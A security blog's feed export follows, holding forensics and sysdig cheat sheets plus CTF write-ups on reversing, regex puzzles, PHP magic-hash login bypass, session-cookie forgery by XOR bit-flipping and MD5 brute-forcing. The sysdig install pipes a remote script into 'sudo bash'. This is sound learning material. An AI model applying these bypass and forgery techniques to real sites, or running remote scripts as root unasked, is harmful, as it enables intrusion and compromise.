tag:blogger.com,1999:blog-77203152211031414742024-03-06T05:52:00.112+01:00hacktracking<pre># <code>cat blog >> /dev/brain 2> /proc/mind</code></pre>Unknownnoreply@blogger.comBlogger385125tag:blogger.com,1999:blog-7720315221103141474.post-65145208556110419822018-03-17T20:21:00.001+01:002018-03-17T20:30:08.967+01:00# Volatility timeline<br />
<pre>$ <code>volatility timeliner --output=body --output-file=timeliner.txt --profile=<profile> --filename=<ram_dump> && volatility mftparser --output=body --output-file=mftparser.txt --profile=<profile> --filename=<ram_dump> && volatility shellbags --output=body --output-file=shellbags.txt --profile=<profile> --filename=<ram_dump></code>
$ <code>cat timeliner.txt mftparser.txt shellbags.txt > timeline.txt</code>
$ <code>mactime -b timeline.txt -d > mactime.txt</code></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-39213624317673562962017-12-05T20:58:00.000+01:002017-12-05T20:58:24.534+01:00# sysdig: System-level exploration tool<br />
<pre><comment>Installing</comment>
# <code>curl -s https://s3.amazonaws.com/download.draios.com/stable/install-sysdig | sudo bash</code>
<comment>Listing chisels</comment>
# <code>sysdig -cl</code>
<comment>Listing fields to filter</comment>
# <code>sysdig -l</code>
<comment>Using a chisel</comment>
# <code>sysdig -c topprocs_cpu</code>
<comment>Writing events to file</comment>
# <code>sysdig -z -w tracefile.scap.gz</code>
<comment>Reading events from file and use a chisel</comment>
# <code>sysdig -z -r tracefile.scap.gz -c topprocs_cpu</code>
<comment>Filtering events for a specific process</comment>
# <code>sysdig proc.name=sshd</code>
<comment>Filtering events for a specific file</comment>
# <code>sysdig fd.name=/var/log/auth.log</code>
<comment>Filtering events for files that contain /etc</comment>
# <code>sysdig fd.name contains /etc</code>
# <code>sysdig evt.args contains /bin/ls</code>
# <code>sysdig fd.ip=1.2.3.4</code>
# <code>sysdig fd.l4proto=udp</code>
<comment>Formating the output</comment>
# <code>sysdig -p '%evt.arg.path' 'evt.type=chdir and user.name=root'</code>
<comment>Information about all chisels</comment>
# <code>sysdig -cl | grep -P '^\w' | awk '{print $1}' | grep -v -e Category -e Use | xargs -L 1 sysdig -i</code>
<comment>Interesting chisels</comment>
# <code>sysdig -c topprocs_cpu</code>
# <code>sysdig -c echo_fds -s 2000 -A proc.name=httpd</code>
# <code>sysdig -c echo_fds -s 2000 -A fd.port=80 and evt.buffer contains GET</code>
# <code>sysdig -c spy_file 'RW /var/log/syslog'</code>
# <code>sysdig -c spy_logs</code>
# <code>sysdig -c spy_syslog</code>
# <code>sysdig -c spy_ip 1.2.3.4</code>
# <code>sysdig -c spy_port 443</code>
# <code>sysdig -c topconns</code>
# <code>sysdig -c topprocs_net</code>
# <code>sysdig -c spy_users 0|1</code>
# <code>sysdig -c lsof</code>
# <code>sysdig -c netstat</code>
# <code>sysdig -c ps</code>
# <code>sysdig -c topfiles_bytes proc.name contains tar</code>
# <code>sysdig -c list_login_shells ncat</code>
# <code>sysdig -c spy_users proc.loginshellid=1234</code>
# <code>sysdig -c stdin -c stdout proc.name=cat</code></pre><br />
<u>Reference</u><br />
<br />
https://github.com/draios/sysdig/wikiUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-10440458722545942742017-12-05T10:57:00.000+01:002017-12-05T10:57:38.460+01:00# SimpleHTTPSServer with letsencrypt certificate<br />
<pre># <code>apt-get update</code>
# <code>apt-get install software-properties-common</code>
# <code>add-apt-repository ppa:certbot/certbot</code>
# <code>apt-get update</code>
# <code>mkdir webserver</code>
# <code>cd webserver</code>
# <code>apt-get install certbot</code>
# <code>mkdir www</code>
# <code>certbot certonly --webroot -w $PWD/www -d mydomain.org -d www.mydomain.org</code>
# <code>cp /etc/letsencrypt/live/mydomain.org/privkey.pem .</code>
# <code>cp /etc/letsencrypt/live/mydomain.org/fullchain.pem .</code>
# <code>cat privkey.pem fullchain.pem > cert.pem</code>
# <code>cat https-server.py</code>
<output>import BaseHTTPServer, SimpleHTTPServer
import os
import ssl
import sys
port = 443
iface = sys.argv[1]
ipv4 = os.popen('ip addr show ' + iface).read().split('inet ')[1].split('/')[0]
cwd = os.getcwd()
certfile = cwd + '/cert.pem'
wwwdir = cwd + '/www'
os.chdir(wwwdir)
httpd = BaseHTTPServer.HTTPServer((ipv4, port), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile = certfile, server_side = True)
httpd.serve_forever()</output>
# <code>python https-server.py eth0</code></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-45813546551269862412017-11-11T22:31:00.000+01:002017-11-11T22:31:05.279+01:00# HITCON CTF 2017 Quals: Sakura - Reversing<br />
<pre># <code>cat sakura.py</code>
<output>import IPython
import angr
import json
import logging
import r2pipe
#angr.manager.l.setLevel(logging.DEBUG)
fn = './sakura-fdb3c896d8a3029f40a38150b2e30a79'
base = 0x400000
toFind = base + 0x110ca
toAvoid = []
r2 = r2pipe.open(filename = fn)
# mov byte [rbp - 0x1e49], 0 == \xc6\x85\xb7\xe1\xff\xff\x00
r2output = json.loads(r2.cmd('/j \\xc6\\x85\\xb7\\xe1\\xff\\xff\\x00'))
for e in r2output:
toAvoid.append(base + int(e['offset']))
#userInputBuffer = base + 0x2121e0
#afterUserInput = base + 0x110ba
#state = p.factory.blank_state(addr = afterUserInput)
#state.memory.store(userInputBuffer, state.se.BVS('userinput', 400 * 8))
#for i in range(400):
# state.mem[userinput + i].char = state.se.BVS('x' + str(i), 8)
p = angr.Project(fn)
print p.arch
print p.entry
print p.filename
p.factory.block(toFind).pp()
print
state = p.factory.entry_state()
sm = p.factory.simgr(state)
sm.explore(find = toFind, avoid = toAvoid)
found = sm.found[0]
dump = found.posix.dumps(0)
print repr(dump)
IPython.embed()</output>
# <code>python sakura.py</code>
<output><Arch AMD64 (LE)>
4196128
sakura-fdb3c896d8a3029f40a38150b2e30a79
0x4110ca: lea rdi, qword ptr [rip + 0x2f9]
0x4110d1: mov eax, 0
0x4110d6: call 0x4006e0
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0092\x00\x00\x00\x0041\x00\x00\x00\x0091\x0017\x00378192\x00\x00638\x004683\x0029618\x00\x0081\x0071\x009837\x00\x00\x00\x0089\x0092\x00\x00\x00\x00936\x00915\x00\x00\x00\x00\x0081\x0012\x00\x00\x008216\x002843\x00\x00\x00\x0031\x0012\x00\x00\x00\x00498\x00931\x0037\x00\x0029341\x00\x00\x003792\x0062\x00192837\x0012\x007128\x00172\x00\x00\x00\x0019\x00\x00\x00\x00\x00\x0092\x00\x00\x00\x0091\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0014\x0065\x00\x00\x00271\x0049\x00\x00\x00\x0041835792\x00\x0089641275\x00125\x0013\x0073\x0091\x00\x0053\x0037\x0076\x0072\x0086\x00\x0086\x00\x00\x0026\x00\x00\x00\x00948\x00512\x00\x00\x0053\x00\x00\x0036\x00\x00\x0057\x0018\x0086\x00\x00\x0052\x00\x00\x0051\x0048\x0049\x00538\x0085\x0069\x00\x0085\x0017863294\x00\x0073615284\x00\x00\x0031\x0074\x00\x00\x00\x00\x00\x0035\x00123\x00'</output>
In [1]: <code>sakura = Popen([fn], stdin = PIPE, stdout = PIPE)</code>
In [2]: <code>flag = sakura.communicate(input = dump)[0]</code>
In [3]: <code>print flag</code>
<output>Out [3]: hitcon{6c0d62189adfd27a12289890d5b89c0dc8098bc976ecc3f6d61ec0429cccae61}</output></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-56060515981732000412017-10-22T19:53:00.000+02:002017-10-22T19:53:36.452+02:00# Pwn2Win 2k17: Baby Regex - Misc<br />
<pre># <code>cat regexbaby_034fa13e17660024b26b6f570aa6b66bba446e2f837c052f012225190387bafa.txt</code>
<output>Open your eyes is all that is needing. The heart lies and the head plays tricks with us, but the eyes see true. Look with your eyes. Hear with your ears. Taste with your mouth. Smell with your nose. Feel with your skin. Then comes the thinking, afterward, and in that way <knowing the truth.
>
Open way to combat the horizon effect is to continue search when an otherwise terminal situation is judged to be particularly dynamic. Such heuristic continuation is sometimes called feedover.
The mind which is created quick to love, is responsive to everything that is pleasing, soon as by pleasure it is awakened into activity. Your apprehensive faculty draws an impression from a real object, and unfolds it within you, so that it makes the mind turn thereto. And if, being turned, it inclines towards it, that inclination is love, for don't say blabla; that is nature, which through pleasure is bound anew within you.
Tune up your circuits, check out your Chips
Because you're going to live a Long Life.
Check the identity card, it shows your code.
Listen to the white noise in your ears - it Fades AWAY.
Watching the sunset on the end of the HIGHWAY ---
City meditation in curving reflections of NEON signs on the Chrome of the Cars.
The WeT Concrete and mirrored Streets recall shows the traffic away,
recalls you to the smell of scratching cloudy sheets.
Billboards and Cholo-Ads above are the unfocused bottle of Time.
Drink it away, FLY to the ORBITAL Fly.
Away to drivin' the ocean of blue-green.
Drivin' away to the ocean of green-blue.</output></pre><pre># <code>ipython</code>
> <code>import re</code>
> <code>data = open('regexbaby_034fa13e17660024b26b6f570aa6b66bba446e2f837c052f012225190387bafa.txt').read()</code>
> <code>def check(regex):</code>
... <code>print len(regex)</code>
... <code>print re.findall(regex, data)</code>
# "from "Drivin" until the end of phrase, without using any letter, single quotes or wildcards, and capturing "Drivin'" in a group, and "blue." in another", with max. "16" chars:
> <code>check('(.{7}).+-(.{5})$')</code>
<output>16
[("Drivin'", 'blue.')]</output>
# "(BONUS) What's the name of the big american television channel (current days) that matchs with this regex: .(.)\1", with max. "x" chars:
# "FLY until... Fly", without wildcards or the word "fly" and using backreference", with max. "14" chars:
# "<knowing the truth. >, without using "line break"", with max. "8" chars:
> <code>check('<[^>]+>')</code>
<output>7
['<knowing the truth. \n>']</output>
# "All "Open's", without using that word or [Ope-], and no more than one point", with max. "11" chars:
> <code>check('(?i)(oPEn)')</code>
<output>10
['Open', 'Open']</output>
# "the follow words: "unfolds", "within" (just one time), "makes", "inclines" and "shows" (just one time), without using hyphen, a sequence of letters (two or more) or the words itself", with max. "38" chars:
> <code>check('(?:\s\S{2}d|t)\s([^F]\w{3,7}[n!s])\s')</code>
<output>36
['unfolds', 'within', 'makes', 'inclines', 'shows']</output>
# "Chips" and "code.", and it is only allowed the letter "c" (insensitive)", with max. "15" chars:
> <code>check(' .{32} (.{5})\n')</code>
<output>14
['Chips', 'code.']</output>
# Type the regex that capture: "the only word that repeat itself in the same word, using a group called "a" (and use it!), and the group expression must have a maximum of 3 chars, without using wildcards, plus signal, the word itself or letters different than [Pa]", with max. "16" chars:
> <code>check('(?P<a>..a)(?P=a)')</code>
<output>16
['bla']</output></pre><pre># <code>cat baby_regex.py</code>
<output>from pwn import *
qa = {
'BONUS': 'cnn',
'knowing the truth': '<[^>]+>',
'FLY': '(?i)(F.y).+\\1',
'[Pa]': '(?P<a>..a)(?P=a)',
'[Ope-]': '(?i)(oPEn)',
'Drivin': '(.{7}).+-(.{5})$',
'unfolds': '(?:\s\S{2}d|t)\s([^F]\w{3,7}[n!s])\s',
'Chips': ' .{32} (.{5})\\n'
}
nqa = len(qa)
host = '200.136.213.148'
port = 5000
correct = 0
while True:
r = remote(host, port)
while True:
q = r.read(1024)
print q
if 'CTF-BR' in q: sys.exit(0)
for k in qa:
if k in q:
a = qa[k]
print 'Sending... ' + a
r.sendline(a)
resp = r.readline()
if 'Nice, next...' in resp:
correct += 1
print '[*] OK!', correct
print
break
r.close()</output>
# <code>python baby_regex.py</code>
<output>Type the regex that capture: "Chips" and "code.", and it is only allowed the letter "c" (insensitive)", with max. "15" chars:
Sending... .{32} (.{5})\n
[*] OK! 1
Type the regex that capture: "<knowing the truth. >, without using "line break"", with max. "8" chars:
Sending... <[^>]+>
[*] OK! 2
Type the regex that capture: "the only word that repeat itself in the same word, using a group called "a" (and use it!), and the group expression must have a maximum of 3 chars, without using wildcards, plus signal, the word itself or letters different than [Pa]", with max. "16" chars:
Sending... (?P<a>..a)(?P=a)
[*] OK! 3
Type the regex that capture: "All "Open's", without using that word or [Ope-], and no more than one point", with max. "11" chars:
Sending... (?i)(oPEn)
[*] OK! 4
Type the regex that capture: "(BONUS) What's the name of the big american television channel (current days) that matchs with this regex: .(.)\1", with max. "x" chars:
Sending... cnn
[*] OK! 5
Type the regex that capture: "from "Drivin" until the end of phrase, without using any letter, single quotes or wildcards, and capturing "Drivin'" in a group, and "blue." in another", with max. "16" chars:
Sending... (.{7}).+-(.{5})$
[*] OK! 6
Type the regex that capture: "the follow words: "unfolds", "within" (just one time), "makes", "inclines" and "shows" (just one time), without using hyphen, a sequence of letters (two or more) or the words itself", with max. "38" chars:
Sending... (?:\s\S{2}d|t)\s([^F]\w{3,7}[n!s])\s
[*] OK! 7
Type the regex that capture: "FLY until... Fly", without wildcards or the word "fly" and using backreference", with max. "14" chars:
Sending... (?i)(F.y).+\1
[*] OK! 8
CTF-BR{Counterintelligence_wants_you!}</output></pre><br />
<u>References</u><br />
<br />
https://www.regexpal.com<br />
https://www.debuggex.comUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-10379544794708637062017-10-15T23:39:00.000+02:002018-03-17T20:30:39.325+01:00# GynvaelEN mission 018<br />
<pre># <code>curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/admin.php?password1=240610708&password2=10932435112'</code>
<output>Welcome back dear admin.
Your flag: I'm not sure this is how equality is supposed to work.
Now try with <a href='superadmin.php'>superadmin.php</a>!</output></pre><pre># <code>curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/superadmin.php'</code>
<output>...
if (hash("sha256", $_GET['password']) ==
'0e12345678901234567890123456789012345678901234567890123456789012')
...</output>
<code>_:)</code></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=adHOlKKbFXM (2:00:22)<br />
<br />
<u>References</u><br />
<br />
https://www.whitehatsec.com/blog/magic-hashes/Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-82058285628504145702017-10-15T21:53:00.000+02:002017-10-15T21:53:46.577+02:00# GynvaelEN mission 017<br />
<pre>zeros = '\x00'*32
base64.b64encode(zeros)
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='
Cookie: mission017session=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
ivencrypted.encode('hex') = '927a00302d2e13896de885ece9f3445d2de83b880d2043a6ecc6e8bbb0a831dc'
result = ''
new = '{"access_level":"admin"}'
for i in range(len(new)):
result += chr(ord(new[i]) ^ ord(ivencrypted[i]))
base64.b64encode(result) == 6VhhU05LYPoyhOCajJ9mZw+JX+VkTmHb
Cookie: mission017session=6VhhU05LYPoyhOCajJ9mZw%2BJX%2BVkTmHb
Decrypted cookie data: {"access_level":"admin"}
Flag: HMAC? What do you mean "HMAC"?</pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=9xGgZUMNl2Y (2:05:00)<br />
<br />
<u>References</u><br />
<br />
https://en.wikipedia.org/wiki/Block_cipher_mode_of_operationUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-66403473842277278152017-10-15T20:44:00.000+02:002017-10-15T20:44:26.450+02:00# GynvaelEN mission 016<br />
<u>Wav to image using RX-SSTV</u><br />
<br />
Slow-scan TV is a method to transmit an image over radio using frequency modulation.<br />
This is the partial message that contains the image:<br />
<br />
<pre>? ? R O N
D I Y M A
U Z ? ? ?
B C K P ?
? ? V W X
Y DHXDMW BQLF KDYNV</pre><br />
<u>Manual decryption</u><br />
<br />
<pre>Y D = I A
HX = ??
DM = AY
W B = ? P
QL = ??
F K = ? ?
DY = IM
NV = RX
I A??AY? P??? ?AIRX ---> I ALWAYS PLAY FAIRX</pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=locDS3uHv_E (2:03:00)<br />
<br />
<u>References</u><br />
<br />
https://en.wikipedia.org/wiki/Slow-scan_televisionUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-35049875490426229272017-09-30T00:00:00.000+02:002017-09-30T00:00:27.061+02:00# EkoParty CTF 2017: OnTheWire (300) - Misc<br />
<br />
<u>Introduction</u><br />
<br />
We have sniffed some bytes of a transmission. What does it say?<br />
51 91 51 31 51 71 112 31 51 123 91 71 95 127 121 51 112 95 121 121 91 71 112 126 112 112 95 79 121 121 95 51 91 71 112 123 121 126 112 91 112 109 91 71 95 51 121 48 112 121 112 126 95 78 121 51 112 123 112 61<br />
<br />
Hint<br />
You will see the flag in a lcd display<br />
<br />
<u>Solution</u><br />
<br />
<pre># <code>cat onthewire.py</code>
<output>bytes = [51, 91, 51, 31, 51, 71, 112, 31, 51, 123, 91, 71, 95, 127, 121, 51, 112, 95, 121, 121, 91, 71, 112, 126, 112, 112, 95, 79, 121, 121, 95, 51, 91, 71, 112, 123, 121, 126, 112, 91, 112, 109, 91, 71, 95, 51, 121, 48, 112, 121, 112, 126, 95, 78, 121, 51, 112, 123, 112, 61]
r = ''
table = {}
for b in bytes:
if hex(b) not in table:
letter = raw_input(hex(b) + '? ')
table[hex(b)] = letter
else:
letter = table[hex(b)]
r += letter
print r.decode('hex')</output>
# <code>python onthewire.py</code>
<output>0x33? 4
0x5b? 5
0x1f? b
0x47? f
0x70? 7
0x7b? 9
0x5f? 6
0x7f? 8
0x79? 3
0x7e? 0
0x4f? e
0x6d? 2
0x30? 1
0x4e? c
0x3d? d
EKO{I_h4v3_pwn3d_y0ur_d1spl4y}</output></pre><br />
<u>Reference</u><br />
<br />
https://en.wikichip.org/wiki/seven-segment_display/representing_lettersUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-41860198841915720172017-09-27T23:40:00.000+02:002017-09-27T23:40:58.369+02:00# GynvaelEN mission 015<br />
<pre># <code>cat mission_15.py</code>
<output>import hashlib
import itertools
import png
import numpy as np
r = png.Reader(file = open('leak.png'))
(width, height, iterator, info) = r.read()
b = [0] * width
for i in iterator:
row = i.tolist()
for i in xrange(0, len(row), 3):
value = row[i:i + 3]
if value == [255, 0, 0]:
b[i / 3] += 1
print ''.join([chr(c) for c in b])
hashes = [
'e6d9fe6df8fd2a07ca6636729d4a615a',
'273e97dc41693b152c71715d099a1049',
'bd014fafb6f235929c73a6e9d5f1e458',
'ab892a96d92d434432d23429483c0a39',
'b56a807858d5948a4e4604c117a62c2d'
]
alphabet = ' !ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
password = [' '] * 5
counter = 0
for result in itertools.product(alphabet, repeat = 5):
word = ''.join(list(result))
m = hashlib.md5()
m.update(word)
hd = m.hexdigest()
if hd in hashes:
pos = hashes.index(hd)
print pos, word
password[pos] = word
counter += 1
if counter == 5: break
print ''.join(password)</output>
# <code>python mission_15.py</code>
<output><?php
if (!isset($_GET['password']) || !is_string($_GET['password'])) {
die("bad password");
}
$p = $_GET['password'];
if (strlen($p) !== 25) {
die("bad password");
}
if (md5($p) !== 'e66c97b8837d0328f3e5522ebb058f85') {
die("bad password");
}
// Split the password in five and check the pieces.
// We need to be sure!
$values = array(
0 => 'e6d9fe6df8fd2a07ca6636729d4a615a',
5 => '273e97dc41693b152c71715d099a1049',
10 => 'bd014fafb6f235929c73a6e9d5f1e458',
15 => 'ab892a96d92d434432d23429483c0a39',
20 => 'b56a807858d5948a4e4604c117a62c2d'
);
for ($i = 0; $i < 25; $i += 5) {
if (md5(substr($p, $i, 5)) !== $values[$i]) {
die("bad password");
}
}
die("GW!");
2 are
0 Pie c
3 delic
1 harts
4 ious!
Pie charts are delicious!</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=BQRX3owv2JI (1:57:30)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-64053149057180420252017-08-15T22:29:00.000+02:002017-08-16T21:30:39.234+02:00# GynvaelEN mission 014<br />
<pre># <code>cat mission_14.py</code>
<output>w = 57
h = 25
directions = {
'EAST': (1, 0),
'NORTH': (0, -1),
'WEST': (-1, 0),
'SOUTH': (0, 1)
}
# smap[y][x] = '#'
smap = [[' ' for x in range(w)] for y in range(h)]
stack = []
x = 0
y = 9
log = open('log.txt').read().splitlines()
for line in log:
if 'Trying' in line:
d = directions[line.split()[1]]
elif 'step' in line:
stack.append((d[0], d[1]))
x += d[0]
y += d[1]
smap[y][x] = '#'
elif 'back' in line:
d = stack.pop()
x -= d[0]
y -= d[1]
for i in smap: print ''.join(i)</output>
# <code>python mission_14.py</code>
<output>
# # ##### # ########## # # ### ## ####### ####### # #
# # # # # # # # # # # #### # # ## # #
### # # ########## #### # # # # # ### # ### # # #
# # # # # ########## # # # # # #
# ####### # # # #### ### # # # # # ########## #
# # # ###### # #### ## ##### ######### # #
### # # # ## # # ## #### # # # # # # ## ## ##
# # # # # ## # # ## ###### # # # # ###
####### ########### #### # # # # ######## ####
#
# ##################################################
#### ##################################################
# # #### ############ ############ ###### ###
## # #### ############ ########### ##### ## ##
# # ### ###### # ## ########### # ## ## ##
# ## ## ##### ### ## ### # ###### ##
# ## ## # ########### # ##### ###
#### ## #### #### ## ## ## #### ####
# ## ### # ##### ########### ## #####
#### ## ############ ################ ## ######
# ### ############ ################ ## ##
# # ##################################################
#######################################################
</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=rhsH-snYkIc (1:55:36)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-65198902628823885082017-08-12T21:35:00.000+02:002017-08-16T21:37:19.788+02:00# GynvaelEN mission 013<br />
<pre># <code>cat parser.py</code>
<output>import sys
def rld(d):
if '*' in d:
i = d.index('*')
c = d[i - 1]
n = ord(d[i + 1]) - 28
d = rld(d[:i - 1] + (c * n) + d[i + 2:])
return d
def vfile(fd, files, line):
if 'vFile:open' in line:
next_line = data[i + 1].split('#')[0]
if 'F-1' not in next_line:
name = line.split(':')[2].split(',')[0]
num = next_line[1:]
fd[num] = name
if name not in files:
files[name] = []
elif 'vFile:close' in line:
num = line.split(':')[2]
fd[num] = ''
elif 'vFile:pread' in line:
num = line.split(':')[2].split(',')[0]
offset = int('0x' + line.split(':')[2].split(',')[2], 16)
next_line = data[i + 1].split('#')[0]
d = rld(''.join(next_line.split(';')[1:]))
name = fd[num]
files[name].append({'offset': offset, 'data': d})
def memory(files, line, mem):
if mem in line:
offset = int('0x' + line.split(',')[0][1:].replace(mem, ''), 16)
next_line = data[i + 1].split('#')[0]
d = rld(next_line).decode('hex')
files[mem].append({'offset': offset, 'data': d})
def write(files):
for name in files:
with open(name + '.bin', 'wb') as f:
for reg in files[name]:
f.seek(reg['offset'])
f.write(reg['data'])
fd = {}
files = {}
fn = sys.argv[1]
with open(fn) as f:
data = f.read().split('$')
action = sys.argv[2]
if action == 'memory':
mem = sys.argv[3]
files[mem] = []
i = 0
while i < len(data):
line = data[i].split('#')[0]
if action == 'vfile':
vfile(fd, files, line)
elif action == 'memory':
memory(files, line, mem)
i += 1
write(files)</output>
# <code>tshark -nr session.pcapng -T fields -e data -qz follow,tcp,raw,3|tail -n +7| tr -d '=\r\n\t'|less|xxd -r -p > follow_tcp_stream3</code>
# <code>python parser.py follow_tcp_stream3 vfile</code>
# <code>ls 2f*</code>
<output>2f6c69622f7838365f36342d6c696e75782d676e752f6c642d322e32342e736f.bin
2f6c696236342f6c642d6c696e75782d7838362d36342e736f2e32.bin
2f6d656469612f73665f425f44524956452f73747265616d2d6c697665636f64696e672f6d697373696f6e732f6d697373696f6e3031335f66696c65732f612e6f7574.bin
2f70726f632f353937392f6d617073.bin
2f70726f632f353937392f706572736f6e616c697479.bin
2f70726f632f353937392f7461736b2f353937392f6d617073.bin
2f70726f632f7379732f6b65726e656c2f72616e646f6d697a655f76615f7370616365.bin</output>
# <code>cat 2f70726f632f353937392f6d617073.bin</code>
<output><highlight>55555555</highlight>4000-555555555000 <highlight>r-xp</highlight> 00000000 00:2a 5868 /media/sf_B_DRIVE/stream-livecoding/missions/mission013_files/<highlight>a.out</highlight>
555555754000-555555756000 rw-p 00000000 00:2a 5868 /media/sf_B_DRIVE/stream-livecoding/missions/mission013_files/a.out
7ffff7dd7000-7ffff7dfc000 r-xp 00000000 08:01 14942250 /lib/x86_64-linux-gnu/ld-2.24.so
7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar]
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffe000 rw-p 00025000 08:01 14942250 /lib/x86_64-linux-gnu/ld-2.24.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]</output>
# <code>python parser.py follow_tcp_stream3 memory 55555555</code>
# <code>r2 55555555.bin</code>
[0x00000000]> <code>s 0x00004831</code>
[0x00004831]> <code>pd 44</code>
<output> 0x00004831 48c785a8feff. mov qword [rbp - 0x158], 0
.-> 0x0000483c 488b85a8feff. mov rax, qword [rbp - 0x158]
| 0x00004843 483b85b8feff. cmp rax, qword [rbp - 0x148]
,==< 0x0000484a 0f83b9000000 jae 0x4909
|| 0x00004850 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x00004857 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x0000485e 4801d0 add rax, rdx ; '('
|| 0x00004861 0fb600 movzx eax, byte [rax]
|| 0x00004864 83f05a xor eax, 0x5a
|| 0x00004867 89c1 mov ecx, eax
|| 0x00004869 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x00004870 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x00004877 4801d0 add rax, rdx ; '('
|| 0x0000487a 8808 mov byte [rax], cl
|| 0x0000487c 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x00004883 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x0000488a 4801d0 add rax, rdx ; '('
|| 0x0000488d 0fb600 movzx eax, byte [rax]
|| 0x00004890 8d5063 lea edx, dword [rax + 0x63] ; 0x63 ; 'c'
|| 0x00004893 488d8df0feff. lea rcx, qword [rbp - 0x110]
|| 0x0000489a 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048a1 4801c8 add rax, rcx ; '&'
|| 0x000048a4 8810 mov byte [rax], dl
|| 0x000048a6 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x000048ad 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048b4 4801d0 add rax, rdx ; '('
|| 0x000048b7 0fb600 movzx eax, byte [rax]
|| 0x000048ba 83f05a xor eax, 0x5a
|| 0x000048bd 89c1 mov ecx, eax
|| 0x000048bf 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x000048c6 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048cd 4801d0 add rax, rdx ; '('
|| 0x000048d0 8808 mov byte [rax], cl
|| 0x000048d2 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x000048d9 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048e0 4801d0 add rax, rdx ; '('
|| 0x000048e3 0fb600 movzx eax, byte [rax]
|| 0x000048e6 8d5063 lea edx, dword [rax + 0x63] ; 0x63 ; 'c'
|| 0x000048e9 488d8df0feff. lea rcx, qword [rbp - 0x110]
|| 0x000048f0 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048f7 4801c8 add rax, rcx ; '&'
|| 0x000048fa 8810 mov byte [rax], dl
|| 0x000048fc 488385a8feff. add qword [rbp - 0x158], 1
|`=< 0x00004904 e933ffffff jmp 0x483c</output>
[0x00004831]> <code>s 0x4909</code>
[0x00004909]> <code>pd 58</code>
<output> 0x00004909 c685c0feffff. mov byte [rbp - 0x140], 0x8e
0x00004910 c685c1feffff. mov byte [rbp - 0x13f], 0x32 ; '2'
0x00004917 c685c2feffff. mov byte [rbp - 0x13e], 0x2f ; '/'
0x0000491e c685c3feffff. mov byte [rbp - 0x13d], 0x39 ; '9'
0x00004925 c685c4feffff. mov byte [rbp - 0x13c], 0xea
0x0000492c c685c5feffff. mov byte [rbp - 0x13b], 0x2d ; '-'
0x00004933 c685c6feffff. mov byte [rbp - 0x13a], 0x27 ; '''
0x0000493a c685c7feffff. mov byte [rbp - 0x139], 0x39 ; '9'
0x00004941 c685c8feffff. mov byte [rbp - 0x138], 0xea
0x00004948 c685c9feffff. mov byte [rbp - 0x137], 0x27 ; '''
0x0000494f c685cafeffff. mov byte [rbp - 0x136], 0xea
0x00004956 c685cbfeffff. mov byte [rbp - 0x135], 0x88
0x0000495d c685ccfeffff. mov byte [rbp - 0x134], 0x25 ; '%'
0x00004964 c685cdfeffff. mov byte [rbp - 0x133], 0x94
0x0000496b c685cefeffff. mov byte [rbp - 0x132], 0x3b ; ';'
0x00004972 c685cffeffff. mov byte [rbp - 0x131], 0x30 ; '0'
0x00004979 c685d0feffff. mov byte [rbp - 0x130], 0x39 ; '9'
0x00004980 c685d1feffff. mov byte [rbp - 0x12f], 0x2f ; '/'
0x00004987 c685d2feffff. mov byte [rbp - 0x12e], 0x29 ; ')'
0x0000498e c685d3feffff. mov byte [rbp - 0x12d], 0x39 ; '9'
0x00004995 c685d4feffff. mov byte [rbp - 0x12c], 0xea
0x0000499c c685d5feffff. mov byte [rbp - 0x12b], 0x2e ; '.'
0x000049a3 c685d6feffff. mov byte [rbp - 0x12a], 0x27 ; '''
